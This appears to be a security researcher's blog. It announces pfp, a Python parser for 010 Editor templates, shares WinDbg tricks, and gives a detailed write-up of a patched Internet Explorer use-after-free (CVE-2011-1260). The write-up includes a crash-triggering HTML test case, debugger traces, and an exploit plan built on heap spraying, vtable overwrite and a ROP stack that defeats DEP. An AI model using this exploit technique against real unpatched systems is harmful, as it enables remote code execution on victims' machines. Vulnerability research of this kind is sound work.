Monday, August 10, 2015

PFP - A Python Interpreter for 010 Templates

I am excited to finally announce a project I have been slowly working on for at least five months now: pfp (docs).

PFP stands for Python Format Parser and is a python-based interpreter for Sweetscape's 010 Editor Templates. PFP takes an input stream and an 010 Editor template and returns a modifiable DOM of the parsed data:

#!/usr/bin/env python
# encoding: utf-8

import os
import pfp
from pfp.fields import PYSTR,PYVAL
import sys

template = """
    BigEndian();
    
    typedef struct {
        // null-terminated
        string label;

        char comment[length - sizeof(label)];
    } TEXT;

    typedef struct {
        uint length<watch=data, update=WatchLength>;
        char cname[4];

        union {
            char raw[length];

            if(cname == "tEXt") {
                TEXT tEXt;
            }
        } data;
        uint crc<watch=cname;data, update=WatchCrc32>;
    } CHUNK;

    uint64 magic;

    while(!FEof()) {
        CHUNK chunks;
    }
"""

png = pfp.parse(
    # expand "~" explicitly so the path does not depend on pfp doing it
    data_file=os.path.expanduser("~/Documents/image.png"),
    template=template,
)

for chunk in png.chunks:
    if chunk.cname == "tEXt":
        print("Comment before: {}".format(chunk.data.tEXt.comment))
        chunk.data.tEXt.comment = "NEW COMMENT"
        print("Comment after: {}".format(chunk.data.tEXt.comment))

# write the modified DOM back out as a new png
with open("/tmp/test.png", "wb") as f:
    png._pfp__build(f)

The above example will use the simple PNG template to parse a png image and change the comment, while keeping length and checksum values correct.

For those who are completely unfamiliar with 010 editor templates, 010 templates parse data by declaring variables. Every variable that is declared (unless prefixed with const or local) parses that amount of data from the input stream. For example, declaring a four-byte character array will parse four bytes from the input stream and display them as a character array.
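To make the "declaring a variable consumes data" idea concrete, here is a minimal sketch in plain python (it does not use pfp). The function name parse_chunk_header and the sample bytes are made up for illustration; the two reads mirror the `uint length;` and `char cname[4];` declarations from the template above.

```python
import io
import struct


def parse_chunk_header(stream):
    """Read fields in declaration order, the way a template would."""
    # uint length;   -> consumes 4 bytes (big-endian, as after BigEndian())
    (length,) = struct.unpack(">I", stream.read(4))
    # char cname[4]; -> consumes the next 4 bytes
    cname = stream.read(4)
    return length, cname


# hypothetical input: a chunk header followed by 13 bytes of chunk data
stream = io.BytesIO(b"\x00\x00\x00\x0dIHDR" + b"\x00" * 13)
length, cname = parse_chunk_header(stream)
print(length, cname, stream.tell())
```

Each "declaration" moves the stream position forward by the size of the declared type, which is all the template has to say to describe a format.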

Installation

PFP can be installed via pip:
pip install pfp

Motivation

My main motivation for writing pfp was to be able to use the large number of already-existing 010 templates from python. The 010 editor GUI is great for simple modifications, but it does not expose an API and does not have a way (that I know of) to auto-update length calculations, checksums, or parse compressed/encoded data. I used to think that 010 editor was only available on Windows, but I have recently found out it is available on Mac and Linux as well.

PFP has added some extensions to the standard 010 Editor special attributes (what I call metadata in pfp) to allow fields to auto-update their value based on the values of other fields. Metadata extensions also exist in PFP to pack/unpack structures within compressed or encoded data.

Read more about metadata in pfp in the metadata documentation.
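As a rough illustration of what the watch/update metadata has to keep in sync for the PNG example, the sketch below rebuilds a chunk by hand. It is plain python and not pfp's implementation; build_chunk is a hypothetical helper. It assumes the PNG chunk layout of a big-endian length, the four-byte chunk name, the data, and a CRC-32 computed over the name and data.

```python
import struct
import zlib


def build_chunk(cname, data):
    """Serialize one PNG chunk, recomputing length and crc from the data."""
    # length covers only the data field
    length = struct.pack(">I", len(data))
    # the crc covers the chunk name and the data, but not the length
    crc = struct.pack(">I", zlib.crc32(cname + data) & 0xFFFFFFFF)
    return length + cname + data + crc


chunk = build_chunk(b"tEXt", b"Comment\x00NEW COMMENT")
print(chunk)
```

Changing the comment changes both derived fields, which is the bookkeeping that the WatchLength and WatchCrc32 update functions in the template are meant to take off your hands.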

Uses

  • Fuzzing
  • General data format modification
  • Data format visualization
  • etc.

Implementation

010 template scripts use a modified C syntax. The main differences are that it allows control-flow statements within struct declarations, and that metadata attributes can be declared as part of a declaration:
struct {
 uchar len<watch=data,update=WatchLength>;
 if(len == 2) {
  short data;
 } else {
  char data[len];
 }
} some_struct;
The first step to implementing PFP was to create an 010 template parser. Since the syntax is so similar to C's syntax, I forked Eli Bendersky's pycparser project and modified it to be able to parse 010 templates. The result is py010parser.

py010parser returns an abstract syntax tree (AST) after parsing a template, which pfp then interprets by iterating over every node in the AST. Writing the interpreter was surprisingly easy, if a tad tedious. I had gotten some inspiration for how to set things up from how firefox's and chrome's javascript interpreters work.
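The toy interpreter below sketches the "iterate over every node in the AST" approach. The Decl and If node classes are hypothetical and much simpler than what py010parser actually produces; the example assumes python 3 (indexing bytes yields an int).

```python
import io


class Decl:
    """Hypothetical AST node: declare a field that consumes `size` bytes."""
    def __init__(self, name, size):
        self.name = name
        self.size = size  # an int, or a callable taking the current scope


class If:
    """Hypothetical AST node: run `body` only when `cond(scope)` is true."""
    def __init__(self, cond, body):
        self.cond = cond
        self.body = body


def interpret(nodes, stream, scope):
    """Walk the nodes in order, dispatching on the node type."""
    for node in nodes:
        if isinstance(node, Decl):
            size = node.size(scope) if callable(node.size) else node.size
            scope[node.name] = stream.read(size)
        elif isinstance(node, If):
            if node.cond(scope):
                interpret(node.body, stream, scope)
        else:
            raise TypeError("unhandled node: %r" % (node,))
    return scope


# roughly: uchar len; if(len == 2) { short data; } else { char data[len]; }
ast = [
    Decl("len", 1),
    If(lambda s: s["len"][0] == 2, [Decl("data", 2)]),
    If(lambda s: s["len"][0] != 2, [Decl("data", lambda s: s["len"][0])]),
]
result = interpret(ast, io.BytesIO(b"\x03abc"), {})
print(result)
```

A real interpreter needs many more node types (expressions, loops, typedefs, function calls), but the control flow stays the same: one handler per node type, called in tree order.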

One of the benefits to having the interpreter written in python is that you can now expose native python functions to 010 templates:
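import pfp.fields
from pfp.native import native
from pfp.fields import PYVAL

# expose sum_numbers to templates under the name "Sum"
@native(name="Sum", ret=pfp.fields.Int64)
def sum_numbers(params, ctxt, scope, stream, coord):
    res = 0
    for param in params:
        # PYVAL converts a pfp field into its python value
        res += PYVAL(param)
    return res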

The sum_numbers python function will be callable from templates as the Sum function. See the functions documentation for more specifics.

Debugger

As I moved from simple template scripts to more complicated ones, it became increasingly difficult to debug errors in my interpreter without an 010 template debugger. So I wrote a template debugger using one of my favorite python modules, the cmd module (one of my other recent-favorites is the sh module):

pfp debugger

You can drop into the interactive debugger by calling Int3() anywhere in a template script. See the debugger documentation for more details.

Vim Plugin

Since vim is my editor of choice (and probably what hackerman uses), I wrote a vim plugin (pfp-vim) to visualize data formats using pfp:
pfp-vim plugin

pfp-vim exposes two commands:
  • :PfpInit - creates ~/.pfp with info about where your templates are stored
  • :PfpParse - parses the current buffer using the template that you choose

Reliability, Bugs, and Testing

I am making a strong effort to have pfp be as stable and reliable as possible. There are currently 110 test cases for the features in pfp. If/when you have a problem with pfp, please submit an issue on github. Pull requests are also always welcome.

laters,

--d0c

mr. monk doing a jig

Wednesday, June 12, 2013

Windbg Tricks - Javascript Windbg Instrumentation

This post is going to cover three levels of usefulness of windbg instrumentation via javascript: subpar, normal, and abnormal.

SUBPAR

The most basic way of instrumenting windbg via javascript is to set a breakpoint on a simple function, such as Math.atan, call Math.atan at the appropriate time in javascript to force windbg to break, and then do whatever you need to do in windbg. Useful, yes, but it's lame and gets extremely tiring after the first time of doing it.

NORMAL

A better way to instrument windbg via javascript is to create a way for javascript to print a message in windbg (and trigger a break):
bu jscript!Js::Math::Atan ".printf \"DEBUG: %mu\\n\", poi(poi(esp+10)+c) ; g"
(If you want to break, remove the ; g)

That's cool, but what if you want to do something a little more complicated, like track all allocations of a specific size after certain javascript statements have been executed? With the previous method, the javascript would have to look something like this:
function log(msg) {
    Math.atan(msg);
}

function track_all_allocations_and_frees_size_x20() {
    Math.asin();
}

log("Executing main javascript");
execute_main_javascript();

log("Track all allocations and frees now");
track_all_allocations_and_frees_size_x20();
do_something_cool();
... and the windbg breakpoints would be something like this:
bu jscript!Js::Math::Atan ".printf \"DEBUG: %mu\\n\", poi(poi(esp+10)+c) ; g"
bu jscript!Js::Math::Asin "bp ntdll!RtlAllocateHeap \".if(poi(esp+c) == 0x20) { .echo ALLOCATED ONE ; knL } ; g\" ; g"
This is more useful, but is still very inflexible. For every new javascript<-->windbg binding you might want, you'd need to also modify your breakpoints in windbg.

ABNORMAL

Below is an abnormally useful way to instrument windbg with javascript:
bu jscript!Js::Math::Atan ".block { .shell -ci \".printf \\\"%mu\\\\n\\\", poi(poi(esp+10)+c)\" find /v \"13333333337\" > cmd_to_exec.txt & exit } ; $$><cmd_to_exec.txt"
This lets you execute windbg commands directly from javascript. The breakpoint basically does an eval("WINDBG_CMD") with a string from memory. Broken down, the breakpoint goes like this:
.block {
    .shell -ci ".printf \"%mu\\n\", poi(poi(esp+10)+c)" find /v "13333333337" > cmd_to_exec.txt & exit
}
$$><cmd_to_exec.txt
Using .block helps to end the .shell command, since semicolons don't work as statement endings for the .shell command (see this article on msdn for more details).

find /v "13333333337" > cmd_to_exec.txt simply saves what was printf'd to the file cmd_to_exec.txt. Specifically, the find command filters out all lines from stdin that contain 13333333337. Any string here will work as long as you never expect to see it in a windbg command that you'd execute via javascript.

$$><cmd_to_exec.txt runs the string we saved to cmd_to_exec.txt as a windbg script.
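If the find /v step seems odd, this small python sketch models what it does to the text piped into it. find_v is a made-up helper and the sample line is an assumed example of what the .printf would emit.

```python
def find_v(lines, needle):
    """Model of `find /v "needle"`: keep only lines that do NOT contain needle."""
    return [line for line in lines if needle not in line]


# hypothetical output of the .printf: the windbg command sent from javascript
printed = [".echo Executing main javascript"]
kept = find_v(printed, "13333333337")
print(kept)
```

Since the sentinel never appears in the command, every line passes through unchanged, so find is only being used as a convenient way to get the .printf output into a file.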

This method makes things much simpler. Going back to the first example, we can now do things like this:
function exec(cmd) {
    Math.atan(cmd);
}
function log(msg) {
    exec(".echo " + msg);
}
function track_allocations(size) {
    exec('bp ntdll!RtlAllocateHeap ".if(poi(esp+c) == 0n' + size + '){ .echo ALLOCATED ONE ; knL } ; g" ; g');
}

log("Executing main javascript");
execute_main_javascript();

var alloc_size = 0x20;
log("Tracking allocations of size " + alloc_size.toString(0x10));
track_allocations(alloc_size);
do_something_cool();
Almost makes you wish you could write a javascript interface to windbg, doesn't it?

Abnormally useful. Laters.

Saturday, April 13, 2013

Windbg Tricks - Module Relocation

When ASLR is not supported, pseudo ASLR is often used to introduce a degree of entropy in where the module is loaded into memory.

The basic idea behind pseudo ASLR is to pre-allocate memory at the location of a module's preferred base address. This forces the module to be loaded at a non-predetermined address. See this for more details.

I stumbled across the windbg command !imgreloc the other day. It can be used to show all modules that have been relocated, along with their original preferred base addresses.

Below is the output when run while attached to firefox.exe (see this ticket about dll blocking and this firefox ticket for a specific history of pseudo ASLR in firefox):

0:017> !imgreloc
00280000 sqlite3 - RELOCATED from 10000000
00300000 js3250 - RELOCATED from 10000000
00400000 firefox - at preferred address
004e0000 nspr4 - RELOCATED from 10000000
00510000 smime3 - RELOCATED from 10000000
00530000 nss3 - RELOCATED from 10000000
005d0000 nssutil3 - RELOCATED from 10000000
005f0000 plc4 - RELOCATED from 10000000
00600000 plds4 - RELOCATED from 10000000
00610000 ssl3 - RELOCATED from 10000000
00640000 xpcom - RELOCATED from 10000000
01220000 browserdirprovider - RELOCATED from 10000000
01540000 brwsrcmp - RELOCATED from 10000000
01de0000 nssdbm3 - RELOCATED from 10000000
02000000 xpsp2res - RELOCATED from 00010000
036a0000 softokn3 - RELOCATED from 10000000
03980000 freebl3 - RELOCATED from 10000000
039d0000 nssckbi - RELOCATED from 10000000
10000000 xul - at preferred address
59a60000 dbghelp - at preferred address
5ad70000 uxtheme - at preferred address
0:017> .shell -ci "!imgreloc" findstr RELOCATED
00280000 sqlite3 - RELOCATED from 10000000
00300000 js3250 - RELOCATED from 10000000
004e0000 nspr4 - RELOCATED from 10000000
00510000 smime3 - RELOCATED from 10000000
00530000 nss3 - RELOCATED from 10000000
005d0000 nssutil3 - RELOCATED from 10000000
005f0000 plc4 - RELOCATED from 10000000
00600000 plds4 - RELOCATED from 10000000
00610000 ssl3 - RELOCATED from 10000000
00640000 xpcom - RELOCATED from 10000000
01220000 browserdirprovider - RELOCATED from 10000000
01540000 brwsrcmp - RELOCATED from 10000000
01de0000 nssdbm3 - RELOCATED from 10000000
02000000 xpsp2res - RELOCATED from 00010000
036a0000 softokn3 - RELOCATED from 10000000
03980000 freebl3 - RELOCATED from 10000000
039d0000 nssckbi - RELOCATED from 10000000

Searching for preferred instead of RELOCATED will yield a list of modules that should remain at their preferred address (and thus be usable for ROP or other such techniques).
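If you save the !imgreloc output to a file, the same split can be done offline. The python sketch below is only an illustration: parse_imgreloc is a made-up helper, and it assumes the output lines look exactly like the ones shown above.

```python
import re

# "<base> <module> - RELOCATED from <preferred>" or "<base> <module> - at preferred address"
LINE_RE = re.compile(
    r"^([0-9a-f]{8}) (\S+) - (RELOCATED from ([0-9a-f]{8})|at preferred address)$"
)


def parse_imgreloc(output):
    """Split !imgreloc output into relocated and non-relocated modules."""
    relocated = {}   # module name -> (current base, preferred base)
    preferred = []   # modules loaded at their preferred address
    for line in output.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # skip prompts and anything else that is not a module line
        base, name, _, original = match.groups()
        if original:
            relocated[name] = (int(base, 16), int(original, 16))
        else:
            preferred.append(name)
    return relocated, preferred


sample = """\
0:017> !imgreloc
00300000 js3250 - RELOCATED from 10000000
00400000 firefox - at preferred address
10000000 xul - at preferred address
"""
relocated, preferred = parse_imgreloc(sample)
print(relocated, preferred)
```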

Windbg Tricks

I have a long list of common windbg tricks that I use. I plan on putting many of them on this blog with the label windbg trick.

This is mainly for my own use so I don't forget about them. Maybe they will be useful for others as well.

Thursday, June 16, 2011

Insecticides don't kill bugs, Patch Tuesdays do

Patch Tuesdays kill bugs. This post is about a bug that I had independently found and written an exploit for, and that was killed last Tuesday by bulletin MS11-050. I wasn't sure at first which CVE this vulnerability had been assigned. [UPDATE] It's definitely CVE-2011-1260 - see Jose's (of spa-s3c.blogspot.com) blog post about it (he originally submitted it to ZDI (ZDI-11-194) -> MS). MS11-050 fixed the vulnerability I was using to achieve RCE on IE 7 and 8 (6 and 9 are also affected, but I didn't make a working exploit for them). This blog post goes over some of the details of the vulnerability, as well as the exploit that I've made for it. Note that all examples in this post were made with IE 8.

The Vuln

What

The vuln is a use-after-free vulnerability in Internet Explorer. This occurs when invalid mshtml!CObjectElements are handled. When an invalid <object> element exists in a web page that is covered by other visible html elements (due to their positioning or styles), formats get computed on a previously-freed mshtml!CObjectElement. If other data has happened to be written over where the object element used to be in memory, invalid values may be used when the freed object is handled (such as a vtable pointer).

A simple test case is below:
<html>
    <body>
        <script language='javascript'>
            document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
            document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
            document.body.innerHTML += "AAAAAAA";
            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
        </script>
    </body>
</html>
Loading this up in a vulnerable version of Internet Explorer should give you a crash on an access violation like the one below:
(170.5c8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=01e88df0 ecx=001f000d edx=00000000 esi=0162c2e8 edi=00000000
eip=3cf76b82 esp=0162c2bc ebp=0162c2d4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CElement::Doc+0x2:
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????
The function it is crashing in is the mshtml!CElement::Doc function:
0:008> u mshtml!CElement::Doc
mshtml!CElement::Doc:
3cf76b80 8b01            mov     eax,dword ptr [ecx]
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] <-- crashes here
3cf76b85 ffd2            call    edx
3cf76b87 8b400c          mov     eax,dword ptr [eax+0Ch]
3cf76b8a c3              ret
3cf76b8b 90              nop
3cf76b8c 90              nop
3cf76b8d 90              nop
The backtrace should look like this:
0:008> knL
 # ChildEBP RetAddr  
00 0162c2b8 3cf14ae1 mshtml!CElement::Doc+0x2
01 0162c2d4 3cf14d4a mshtml!CTreeNode::ComputeFormats+0xb9
02 0162c580 3cf239fe mshtml!CTreeNode::ComputeFormatsHelper+0x44
03 0162c590 3cf239be mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
04 0162c5a0 3cf239a5 mshtml!CTreeNode::GetFancyFormatHelper+0xf
05 0162c5b4 3d0a6d9f mshtml!CTreeNode::GetFancyFormat+0x35
06 0162c5bc 3d0a6cfa mshtml!CLineCore::AO_GetFancyFormat+0x23
07 0162c5f0 3cf69f34 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
08 0162cde8 3cfb98e4 mshtml!CDisplay::RecalcLines+0x6e4
09 0162cec4 3cf25d39 mshtml!CDisplay::WaitForRecalc+0x208
0a 0162cf14 3cf4938b mshtml!CFlowLayout::Notify+0x7d7
0b 0162cf20 3cf4745e mshtml!NotifyElement+0x41
0c 0162cf74 3cf473f5 mshtml!CMarkup::SendNotification+0x60
0d 0162cf9c 3cf5254a mshtml!CMarkup::Notify+0xd4
0e 0162cfe4 3cf256ea mshtml!CElement::SendNotification+0x4a
0f 0162d008 3cef1318 mshtml!CElement::EnsureRecalcNotify+0x15f
10 0162d084 3cef2461 mshtml!CDisplayPointer::MoveUnit+0x2b2
11 0162d170 3cef22ce mshtml!CHTMLEditor::AdjustPointer+0x16f
12 0162d1a4 3cef34ed mshtml!CEditTracker::AdjustPointerForInsert+0x8b
13 0162d200 3cef3361 mshtml!CCaretTracker::PositionCaretAt+0x141
Now that you know a little about the crash, you want to know more or less what's going on, right? After some initial sleuthing, I set the breakpoints below to print out the type of objects that were being allocated and freed by printing out their vtable pointer.
0:008> bl
 0 e 635a6811     0001 (0001)  0:**** mshtml!CreateElement+0x57 ".printf \"mshtml!CreateElement created element at %08x, of type: %08x\\n\", poi(ebp+10), poi(poi(ebp+10)); g"
 1 e 6362582e     0001 (0001)  0:**** mshtml!CTreeNode::Release+0x27 ".printf \"mshtml!CTreeNode::Release, freeing pointer to obj at %08x, obj at %08x, of type %08x\\n\", edx, poi(edx), poi(poi(edx)); g"
 2 e 635a3272     0001 (0001)  0:**** mshtml!CTreeNode::CTreeNode+0x8c ".printf \"mshtml!CTreeNode::CTreeNode allocated obj at %08x, ref to obj %08x of type %08x\\n\", eax, poi(eax), poi(poi(eax)); g"
After setting the breakpoints and reloading the test case in Internet Explorer, windbg should print out something like this:
 0:016> g
 ...
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f220, ref to obj 001f7c50 of type 637666e0 <--- EBX (23f220)
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f640, ref to obj 0021a1d8 of type 63630788
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f6f0, ref to obj 02bba4f0 of type 6362fa90
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f278, obj at 00213e48, of type 635afad0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f4e0, obj at 00218948, of type 635af850
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f380, obj at 002140b0, of type 635ba8c0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f488, obj at 002185e8, of type 635af580
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f328, obj at 00218648, of type 635a21b0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f118, obj at 0021a088, of type 635ad1f8
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f118, ref to obj 00218618 of type 635a21b0
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f488, ref to obj 00218588 of type 635af580
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f380, ref to obj 00218408 of type 635af850
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f4e0, ref to obj 00213b70 of type 635afad0
 mshtml!CTreeNode::CTreeNode allocated obj at 0023f278, ref to obj 00213e10 of type 635ba8c0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f220, obj at 001f7c50, of type 637666e0 <--- EBX (23f220)
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f4e0, obj at 00213b70, of type 635afad0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f380, obj at 00218408, of type 635af850
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f278, obj at 00213e10, of type 635ba8c0
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f488, obj at 00218588, of type 635af580
 mshtml!CTreeNode::Release, freeing pointer to obj at 0023f118, obj at 00218618, of type 635a21b0
 (d30.ab4): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00000000 ebx=0023f220 ecx=001f00bd edx=00000000 esi=020be380 edi=00000000 <--- EBX is 23f220
 eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 mshtml!CElement::Doc+0x2:
 6363fcc6 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:00000070=????????
Now that we know the vtable pointer of the object (637666e0), a quick lookup will tell us which object we are dealing with:
0:008> ln 637666e0
(637666e0)   mshtml!CObjectElement::`vftable'   |  (63639e88)   mshtml!CDummyUnknown::`vftable'
Exact matches:
 mshtml!CObjectElement::`vftable' = <no type information>
In this instance, ebx is the pointer to the object that IE is calling the Doc function on. eax then becomes the vtable pointer, and edx is supposed to hold the address of the CObjectElement function that should be called:
(.frame 1 - mshtml!CTreeNode::ComputeFormats+0xb)
3cf14ada 8b0b            mov     ecx,dword ptr [ebx]     <-- ebx = pointer to a CObjectElement
                                                             ecx = pointer to vtable
3cf14adc e89f200600      call    mshtml!CElement::Doc (3cf76b80)
...
(mshtml!CElement::Doc)
3cf76b80 8b01            mov     eax,dword ptr [ecx]     <-- eax = CObjectElement vtable
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] <-- edx = function (vtable+0x70)
3cf76b85 ffd2            call    edx
3cf76b87 8b400c          mov     eax,dword ptr [eax+0Ch]
The function that was supposed to be called is the mshtml!CElement::SecurityContext function:
0:008> x mshtml!CObjectElement*vftable*
3d2db488 mshtml!CObjectElement::`vftable' = 
0:008> ?  3d2db488+70
Evaluate expression: 1026405624 = 3d2db4f8

(memory @ 3d2db488 - pointer and symbol:)
00 3d2db488 3cf93385 mshtml!CObjectElement::PrivateQueryInterface
04 3d2db48c 3cf89f6d mshtml!CElement::PrivateAddRef
08 3d2db490 3cf7e481 mshtml!CElement::PrivateRelease
0c 3d2db494 3d2db6e9 mshtml!CObjectElement::`vector deleting destructor'
10 3d2db498 3cebe591 mshtml!CSite::Init
14 3d2db49c 3d2db72e mshtml!CObjectElement::Passivate
18 3d2db4a0 3cf79975 mshtml!CBase::IsRootObject
1c 3d2db4a4 3cf08e95 mshtml!CBase::EnumerateTrackedReferences
20 3d2db4a8 3d1a9a42 mshtml!CBase::SetTrackedState
24 3d2db4ac 3cf4581e mshtml!CElement::GetInlineStylePtr
28 3d2db4b0 3cf2381f mshtml!CElement::GetRuntimeStylePtr
2c 3d2db4b4 3d246af6 mshtml!CBase::VersionedGetIDsOfNames
30 3d2db4b8 3d1cd70f mshtml!CElement::VersionedInvoke
34 3d2db4bc 3d2def3c mshtml!COleSite::VersionedGetDispID
38 3d2db4c0 3d2db832 mshtml!CObjectElement::VersionedInvokeEx
3c 3d2db4c4 3d200dcb mshtml!CBase::VersionedDeleteMemberByName
40 3d2db4c8 3d200e47 mshtml!CBase::VersionedDeleteMemberByDispID
44 3d2db4cc 3cf41bde mshtml!CBase::VersionedGetNextDispID
48 3d2db4d0 3d00deae mshtml!CBase::VersionedGetMemberName
4c 3d2db4d4 3cf41bde mshtml!CBase::VersionedGetNextDispID
50 3d2db4d8 3d246b45 mshtml!CBase::VersionedGetNameSpaceParent
54 3d2db4dc 3d2011b2 mshtml!CBase::GetEnabled
58 3d2db4e0 3d2011b2 mshtml!CBase::GetEnabled
5c 3d2db4e4 3d2df38e mshtml!COleSite::GetPages
60 3d2db4e8 3d2df340 mshtml!COleSite::InterfaceSupportsErrorInfo
64 3d2db4ec 3d2de127 mshtml!CObjectElement::QueryStatus
68 3d2db4f0 3d2de1a7 mshtml!CObjectElement::Exec
6c 3d2db4f4 3cf492cc mshtml!CFlowLayout::IsFlowOrSelectLayout
70 3d2db4f8 3cf76b50 mshtml!CElement::SecurityContext
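The offset arithmetic is easy to double-check outside of windbg. The python sketch below only uses the values from the output above and assumes 4-byte pointers (32-bit IE).

```python
VTABLE = 0x3d2db488   # mshtml!CObjectElement::`vftable' from the x output above
OFFSET = 0x70         # offset used by mov edx,dword ptr [eax+70h]
POINTER_SIZE = 4      # assumption: 32-bit process, 4-byte vtable entries

slot_address = VTABLE + OFFSET
slot_index = OFFSET // POINTER_SIZE

print(hex(slot_address), slot_address, slot_index)
```

This gives the same 3d2db4f8 that windbg evaluated, and shows that the slot in question is entry 28 (counting from zero) of the vtable.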

Why

I noticed that if I comment out one of the tags in the test case (to keep IE from crashing),
<html>
    <body>
        <script language='javascript'>
            document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
            //document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
            document.body.innerHTML += "AAAAAAA";
            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
        </script>
    </body>
</html>
and then go into the developer tools and look at the current state of the DOM, the <object> element doesn't show up, probably because I never specified which type of object it needs to be.


Knowing this, taking another look at the stacktrace of a crash should give us the gist of the rest:
0:008> k
ChildEBP RetAddr  
020be350 63602718 mshtml!CElement::Doc+0x2
020be36c 636026a3 mshtml!CTreeNode::ComputeFormats+0xb9
020be618 63612a85 mshtml!CTreeNode::ComputeFormatsHelper+0x44
020be628 63612a45 mshtml!CTreeNode::GetFancyFormatIndexHelper+0x11
020be638 63612a2c mshtml!CTreeNode::GetFancyFormatHelper+0xf
020be64c 637d29ab mshtml!CTreeNode::GetFancyFormat+0x35
020be654 637d2906 mshtml!CLineCore::AO_GetFancyFormat+0x23
020be688 63675c93 mshtml!CRecalcLinePtr::RecalcMargins+0x19d
020bee80 6369985f mshtml!CDisplay::RecalcLines+0x6e4
020bef5c 6361c037 mshtml!CDisplay::WaitForRecalc+0x208
020befac 636514de mshtml!CFlowLayout::Notify+0x7d7
020befb8 636017f2 mshtml!NotifyElement+0x41
020bf00c 6365134f mshtml!CMarkup::SendNotification+0x60
020bf034 63666bc1 mshtml!CMarkup::Notify+0xd4
020bf07c 6361bf07 mshtml!CElement::SendNotification+0x4a
020bf0a0 635d82b7 mshtml!CElement::EnsureRecalcNotify+0x15f
020bf11c 635cc225 mshtml!CDisplayPointer::MoveUnit+0x2b2
020bf208 635cc092 mshtml!CHTMLEditor::AdjustPointer+0x16f
020bf23c 635cd2af mshtml!CEditTracker::AdjustPointerForInsert+0x8b
020bf298 635cd123 mshtml!CCaretTracker::PositionCaretAt+0x141
My guess at the overall flow of things leading up to the crash is that the <object> element was initially added to some list of elements to be displayed. The object element then gets deleted because it is invalid and has nothing to display, but it isn't removed from the list. Something happens with the layout where formats need to be recalculated, and IE tries to call a method on the freed object, leading to the use-after-free.

The Exploit

The basic plan for exploiting this vulnerability should be to cause the <object> element to be freed, get data that we control to overwrite the freed object, and then do something that would cause functions to be called on the object element. Simple enough. The exploit for IE7 and IE8 with DEP disabled involves your basic heap spray (nops + shellcode) and overwriting the CObjectElement with 0c0c0c0cs. Once the mshtml!CElement::Doc function is called, code execution should go something like this:
mshtml!CElement::Doc:
3cf76b80 8b01            mov     eax,dword ptr [ecx]  ds:0023:147f00a7=0c0c0c0c
3cf76b82 8b5070          mov     edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=0c0c0c0c
3cf76b85 ffd2            call    edx {<Unloaded_sspc.dll>+0xc0c0c0b (0c0c0c0c)} <-- (execute nops+shellcode)
3cf76b87 8b400c          mov     eax,dword ptr [eax+0Ch]
3cf76b8a c3              ret
The exploit for IE8 with DEP enabled required a ROP payload: the CObjectElement is overwritten with 0c0c0c0cs, a second heap-spray should land the ROP stack at 0c0c0c0c, and a third heap-spray should land the nops + shellcode at 0x23000000. Once everything is set up, the ROP stack should be found at 0c0c0c0c and should look like this:
0c0c0c0c 7c809af1 ; 1:kernel32!VirtualAlloc (first ret)
0c0c0c10 7c901db3 ; 2:ntdll!memcpy (second ret)
0c0c0c14 7f000000 ; 1:VirtualAlloc:lpAddress
0c0c0c18 00004000 ; 1:VirtualAlloc:dwSize
0c0c0c1c 00003000 ; 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
0c0c0c20 00000040 ; 1:VirtualAlloc:flProtect rwx
0c0c0c24 7f001000 ; 3:nops+shellcode (third ret)
0c0c0c28 7f001000 ; 2:memcpy:dst
0c0c0c2c 23000100 ; 2:memcpy:src
0c0c0c30 00002fff ; 2:memcpy:size
0c0c0c34 be9e2688 ; random
0c0c0c38 f285b61c ; random
0c0c0c3c e8f23175 ; random
0c0c0c40 6f2edb99 ; random
0c0c0c44 bd93f4eb ; random
0c0c0c48 527787a7 ; random
0c0c0c4c 4991e07d ; random
0c0c0c50 1513dcf2 ; random
0c0c0c54 7b40bc07 ; random
0c0c0c58 ba54da55 ; random
0c0c0c5c 5177fafb ; random
0c0c0c60 b1dfcf01 ; random
0c0c0c64 6643baa9 ; random
0c0c0c68 2136edc5 ; random
0c0c0c6c 31fd6e6b ; random
0c0c0c70 f4a9dcd0 ; random
0c0c0c74 de2f62e1 ; random
0c0c0c78 a19314eb ; random
